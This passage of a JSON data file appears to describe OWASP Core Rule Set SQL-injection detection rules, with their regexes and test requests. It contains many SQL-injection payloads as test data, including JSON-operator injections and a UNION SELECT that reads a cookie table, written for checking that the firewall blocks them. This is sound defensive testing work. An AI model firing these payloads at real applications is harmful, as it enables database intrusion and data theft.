@> '{\"a\":\"a\"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state\n", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: blah/\"}' and data @> '{\"a\":\"a\"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state\n", "test_id": 22, "request": { "method": "GET", "uri": "/get/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"a\":\"b\"}' ? 'a'\n", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"a\":\"b\"}' ? 'a'\n", "test_id": 24, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '[1,2]' ? '1'\n", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '[1,2]' ? '1'\n", "test_id": 26, "request": { "method": "GET", "uri": "/get/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"name\":\"asd\"}' ?| array['a','name']\n", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"name\":\"asd\"}' ?| array['a','name']\n", "test_id": 28, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"name\":\"asd\"}' ?& array['a','name']\n", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"name\":\"asd\"}' ?& array['a','name']\n", "test_id": 30, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '[1,2,3]'::json ->> 2='3'\n", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '[1,2,3]'::json ->> 2='3'\n", "test_id": 32, "request": { "method": "GET", "uri": "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: OR '{\"a\":1}'::jsonb #> '{a,b}' ? 'c'\n", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "post_body", "value": "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" } ] }, { "description": "JSON in SQL (REQUEST_FILENAME)\ndecoded payload: OR '{\"a\":1}'::jsonb #> '{a,b}' ? 'c'\n", "test_id": 34, "request": { "method": "GET", "uri": "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "SQL Comment in payload\ndecoded payload: OR '{\"a\":1}'::jsonb #> /* Some * comment */'{a,b}' ? 'c'\n", "test_id": 35, "request": { "method": "GET", "uri": "/get?q=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%2F%2A%20Some%20%2A%20comment%20%2A%2F%27%7Ba%2Cb%7D%27%20%3F%20%27c%27", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%2F%2A%20Some%20%2A%20comment%20%2A%2F%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" } ] }, { "description": "SQL Comment in payload\ndecoded payload: '{\"a\": {\"b\": [\"foo\",\"bar\"]}}'::json #>> '{a,b,1}'\n", "test_id": 36, "request": { "method": "GET", "uri": "/get?q='%7B%22a%22%3A%20%7B%22b%22%3A%20%5B%22foo%22%2C%22bar%22%5D%7D%7D'%3A%3Ajson%20%23%3E%3E%20'%7Ba%2Cb%2C1%7D'", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q='%7B%22a%22%3A%20%7B%22b%22%3A%20%5B%22foo%22%2C%22bar%22%5D%7D%7D'%3A%3Ajson%20%23%3E%3E%20'%7Ba%2Cb%2C1%7D'" } ] }, { "description": "SQL Comment in payload\ndecoded payload: '[\"a\", {\"b\":1}]'::jsonb #- '{1,b}'\n", "test_id": 37, "request": { "method": "GET", "uri": "/get?q='%5B%22a%22%2C%20%7B%22b%22%3A1%7D%5D'%3A%3Ajsonb%20%23-%20'%7B1%2Cb%7D'", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q='%5B%22a%22%2C%20%7B%22b%22%3A1%7D%5D'%3A%3Ajsonb%20%23-%20'%7B1%2Cb%7D'" } ] }, { "description": "False Positive: Matching ? in natural english\ndecoded payload: how was your day today?\n", "test_id": 38, "request": { "method": "GET", "uri": "/get?q=how%20was%20your%20day%20today?", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q=how%20was%20your%20day%20today?" } ] }, { "description": "PostgreSQL\ndecoded payload: '{\"b\":2}'::jsonb @ '{\"a\":1, \"b\":2}'::jsonb\n", "test_id": 39, "request": { "method": "GET", "uri": "/get?q='%7B%22b%22:2%7D'::jsonb%20@%20'%7B%22a%22:1,%20%22b%22:2%7D'::jsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q='%7B%22b%22:2%7D'::jsonb%20@%20'%7B%22a%22:1,%20%22b%22:2%7D'::jsonb" } ] }, { "description": "SQLite\ndecoded payload: '{\"a\":2,\"c\":[4,5,{\"f\":7}]}' < '$.c[2].f' = 7\n", "test_id": 40, "request": { "method": "GET", "uri": "/get?q='%7B%22a%22:2,%22c%22:%5B4,5,%7B%22f%22:7%7D%5D%7D'%20%3C%20'$.c%5B2%5D.f'%20=%207", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q='%7B%22a%22:2,%22c%22:%5B4,5,%7B%22f%22:7%7D%5D%7D'%20%3C%20'$.c%5B2%5D.f'%20=%207" } ] }, { "description": "SQLite\ndecoded payload: '{\"a\":2,\"c\":[4,5,{\"f\":7}]}' > '$.c[2].f' = 7\n", "test_id": 41, "request": { "method": "GET", "uri": "/get?q='%7B%22a%22:2,%22c%22:%5B4,5,%7B%22f%22:7%7D%5D%7D'%20%3E%20'$.c%5B2%5D.f'%20=%207", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q='%7B%22a%22:2,%22c%22:%5B4,5,%7B%22f%22:7%7D%5D%7D'%20%3E%20'$.c%5B2%5D.f'%20=%207" } ] }, { "description": "MySQL\ndecoded payload: SELECT id FROM users WHERE id=JsoN_EXTraCT/**/(/**/' {\"a\":1} '/**/,/**/' $.a '/**/);\n", "test_id": 42, "request": { "method": "GET", "uri": "/get?q=SELECT%20id%20FROM%20users%20WHERE%20id=JsoN_EXTraCT/**/(/**/'%20%20%7B%22a%22:1%7D%20%20'/**/,/**/'%20$.a%20'/**/);", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "q=SELECT%20id%20FROM%20users%20WHERE%20id=JsoN_EXTraCT/**/(/**/'%20%20%7B%22a%22:1%7D%20%20'/**/,/**/'%20$.a%20'/**/);" } ] }, { "description": "False Positive: Matching orphan operator\ndecoded payload: I Love you <3\n", "test_id": 43, "request": { "method": "GET", "uri": "/get?gift_message=%20I%20Love%20you%20%3C3", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "gift_message=%20I%20Love%20you%20%3C3" } ] }, { "description": "False Positive: Matching -> sequence\ndecoded payload: Find your solution here -> link\n", "test_id": 44, "request": { "method": "GET", "uri": "/get?message=Find%20your%20solution%20here%20-%3E%20link", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942550 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "message=Find%20your%20solution%20here%20-%3E%20link" } ] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: '{\"a\":[1,2,3,4,5]}'::jsonb @? '$.a[*]'\n", "test_id": 45, "request": { "method": "GET", "uri": "/get/payload='%7B%22a%22%3A%5B1%2C2%2C3%2C4%2C5%5D%7D'%3A%3Ajsonb%20%40%3F%20'%24.a%5B*%5D'", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: '{\"a\":[1,2,3,4,5]}'::jsonb @@ '$.a[*]'\n", "test_id": 46, "request": { "method": "GET", "uri": "/get/payload='%7B%22a%22%3A%5B1%2C2%2C3%2C4%2C5%5D%7D'%3A%3Ajsonb%20%40%40%20'%24.a%5B*%5D'", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: '[\"a\", \"b\"]'::jsonb - 1\n", "test_id": 47, "request": { "method": "GET", "uri": "/get/payload='%5B%22a%22%2C%20%22b%22%5D'%3A%3Ajsonb%20-%201", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] }, { "description": "JSON in SQL (ARGS)\ndecoded payload: '[1, 2]'::jsonb || '3'::jsonb\n", "test_id": 48, "request": { "method": "GET", "uri": "/get/payload='%5B1%2C%202%5D'%3A%3Ajsonb%20%7C%7C%20'3'%3A%3Ajsonb", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942550 ] }, "malicious_patterns": [] } ], "raw_rule": { "type": "SecRule", "lineno": 608, "variables": [ { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\\"'`][\\[\\{][^#\\]\\}]*[\\]\\}]+[\\\"'`]|(?:[\\-@]>?|<@|@[\\?@]|\\?(?:(?:)|&|\\|#>)|#(?:>>|-)|->>|[<>])[\\\"'`](?:[\\[\\{][^#\\]\\}]*[\\]\\}]+[\\\"'`]|\\$[\\.\\[])|\\bjson_extract\\b[^\\(]*\\([^\\)]*\\)", "actions": [ { "act_name": "id", "lineno": 609, "act_quote": "no_quote", "act_arg": "942550", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 610, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 611, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 612, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 613, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 613, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 613, "act_quote": "no_quote", "act_arg": "removeWhitespace", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 614, "act_quote": "quotes", "act_arg": "JSON-Based SQL Injection", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 615, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 616, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 617, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 618, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 619, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 620, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 621, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 622, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 623, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 624, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 625, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 626, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 627, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 608 } }, { "rule_id": "942013", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 630, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 630, "act_quote": "no_quote", "act_arg": "942013", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 630, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 630, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 630, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 630, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 630, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 630, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 630 } }, { "rule_id": "942014", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "2", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 631, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "2", "actions": [ { "act_name": "id", "lineno": 631, "act_quote": "no_quote", "act_arg": "942014", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 631, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 631, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 631, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 631, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 631, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 631, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 631 } }, { "rule_id": "942120", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[!=]=|&&|\\|\\||->|>[=>]|<(?:[<=]|>(?:[\\s\\x0b]+binary)?)|\\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\\\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\\s\\x0b]*\\()|r(?:egexp|like)[\\s\\x0b]+binary|not[\\s\\x0b]+between[\\s\\x0b]+(?:0[\\s\\x0b]+and|(?:'[^']*'|\\\"[^\\\"]*\\\")[\\s\\x0b]+and[\\s\\x0b]+(?:'[^']*'|\\\"[^\\\"]*\\\"))|is[\\s\\x0b]+null|like[\\s\\x0b]+(?:null|[0-9A-Z_a-z]+[\\s\\x0b]+escape\\b)|(?:^|[^0-9A-Z_a-z])in[\\s\\x0b\\+]*\\([\\s\\x0b\\\"0-9]+[^\\(\\)]*\\)|[!<->][\\s\\x0b]*all\\b", "negated": false } }, "transformations": [ "none", "utf8toUnicode", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack: SQL Operator Detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=blahblah&var2=LIKE%20NULL", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=blahblah&var2=LIKE%20NULL" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=RegExp" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=RegExp" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ">>" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": ">>" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", 